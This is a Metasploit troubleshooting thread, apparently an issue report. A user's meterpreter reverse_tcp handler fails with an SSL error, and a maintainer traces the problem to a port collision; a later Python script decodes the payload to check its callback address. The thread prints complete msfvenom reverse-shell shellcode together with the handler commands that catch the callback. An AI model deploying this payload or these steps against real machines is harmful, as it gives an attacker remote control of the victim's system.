How'd you do it?
It's to obtain a meterpreter session.
The Meterpreter prompt should show up as below.
[*] Sending stage (884270 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.4:4444 -> 192.168.56.1:56007) at 2015-07-13 00:04:26 +0900
meterpreter >
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.56.4:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.56.119
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol
Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).
Linux kali32 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux
How are you generating the payload? msfvenom? Can you post the logs?
Thanks.
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=4444 -f python
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of python file: 1602 bytes
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x6a\x05\x68\xc0\xa8\x38\x04\x68\x02\x00\x11"
buf += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
buf += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
root@kali32:~#
root@kali32:~# msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) >
msf exploit(handler) > set LHOST 192.168.56.4
LHOST => 192.168.56.4
msf exploit(handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.4     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.56.4:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.56.119
[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 state=SSLv2/v3 read client hello A: unknown protocol
How did you invoke your payload with format 'python' on the target?
I noticed your expected behavior section is from 2015. Are you following some sort of tutorial or blog post about exploiting python programs?
Yes, I follow this blog:
http://inaz2.hatenablog.com/entry/2015/07/13/011841
Thanks.
I followed the blog steps and it worked as expected. I'm suspecting you pointed the Python shellcode injector at the Metasploit listener, instead of the vulnerable service. That would create the error you see here. The blog is confusing because the author uses port 4444 for both the vulnerable service and the listener. Try changing the ports and you will see what I mean.
Good luck.
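The diagnosis above hinges on two things being consistent: the address baked into the msfvenom output must match the handler's LHOST/LPORT, and the listener must not share a port with the service the injector is supposed to reach. The following script is an added example (not from the thread, the blog, or the Metasploit project) that makes both checks mechanical. It decodes the `buf += "\x.."` lines back into bytes, recovers the callback address from the x86 reverse_tcp stager's sockaddr_in push, compares it with the handler options, and applies the port-collision reasoning from the last comment to a multi/handler transcript. The excerpt of the msfvenom output and the log lines are copied from the thread; the pattern used to locate the sockaddr push (`push <ipv4>` followed by `push <AF_INET, port>`) is an assumption about this specific stager layout, not something the thread states.

```python
import re
import socket
import struct

# Excerpt of the "-f python" msfvenom output posted in the thread (the lines
# around the socket-address push). The full buffer decodes the same way.
MSFVENOM_OUTPUT = r'''
buf = ""
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x6a\x05\x68\xc0\xa8\x38\x04\x68\x02\x00\x11"
buf += "\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
'''

# Handler transcript from the thread, used as sample input for the diagnosis.
HANDLER_LOG = [
    "[*] Started reverse TCP handler on 192.168.56.4:4444",
    "[*] Starting the payload handler...",
    "[*] Sending stage (957999 bytes) to 192.168.56.119",
    "[-] OpenSSL::SSL::SSLError SSL_accept returned=1 errno=0 "
    "state=SSLv2/v3 read client hello A: unknown protocol",
]


def decode_python_buf(text):
    """Turn msfvenom's `buf += "\\x.."` lines back into the raw byte string."""
    out = bytearray()
    for m in re.finditer(r'buf \+= "((?:\\x[0-9a-fA-F]{2})*)"', text):
        out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)


def extract_callback(shellcode):
    """Recover (ip, port) from the stager's pushed sockaddr_in.

    Assumption: the x86 reverse_tcp stager builds the address with
    `push imm32` (opcode 0x68) of the IPv4 address followed by
    `push imm32` of AF_INET (0x0002, little-endian) and the port in
    network byte order, i.e. the byte pattern 68 aa bb cc dd 68 02 00 pp pp.
    """
    m = re.search(rb"\x68(.{4})\x68\x02\x00(.{2})", shellcode, re.DOTALL)
    if not m:
        return None
    ip = socket.inet_ntoa(m.group(1))
    port = struct.unpack(">H", m.group(2))[0]
    return ip, port


def check_handler_match(shellcode, lhost, lport):
    """List every way the generated payload disagrees with the handler options."""
    callback = extract_callback(shellcode)
    if callback is None:
        return ["could not locate the callback address in the shellcode"]
    problems = []
    if callback[0] != lhost:
        problems.append(f"payload connects to {callback[0]}, handler LHOST is {lhost}")
    if callback[1] != lport:
        problems.append(f"payload connects to port {callback[1]}, handler LPORT is {lport}")
    return problems


def diagnose_handler_log(lines, handler_port, target_service_port):
    """Apply the thread's reasoning to a multi/handler transcript.

    A stage being sent and then SSL_accept failing with 'unknown protocol'
    means whatever connected did not behave like the stager afterwards. If
    the listener and the vulnerable service share a port, the most likely
    cause is that the injector was pointed at the listener itself.
    """
    staged = any("Sending stage" in line for line in lines)
    ssl_error = any("SSL_accept" in line and "unknown protocol" in line
                    for line in lines)
    if not (staged and ssl_error):
        return None
    if handler_port == target_service_port:
        return (f"listener and target service both use port {handler_port}: "
                "the shellcode injector probably connected to the handler "
                "instead of the vulnerable service; use different ports")
    return ("stage was sent but the TLS handshake failed: confirm that what "
            "connected to the handler was the stager and not another client")


if __name__ == "__main__":
    sc = decode_python_buf(MSFVENOM_OUTPUT)
    print("callback in payload:", extract_callback(sc))
    print("mismatches vs handler:", check_handler_match(sc, "192.168.56.4", 4444))
    print("diagnosis:", diagnose_handler_log(HANDLER_LOG, 4444, 4444))
```

Run it as-is to see the thread's own numbers come out of the posted bytes (192.168.56.4:4444) and the port-collision explanation printed for the posted log. Feeding it a handler transcript where the listener port differs from the service port yields the more general message, which is the quickest way to confirm you have actually separated the two ports.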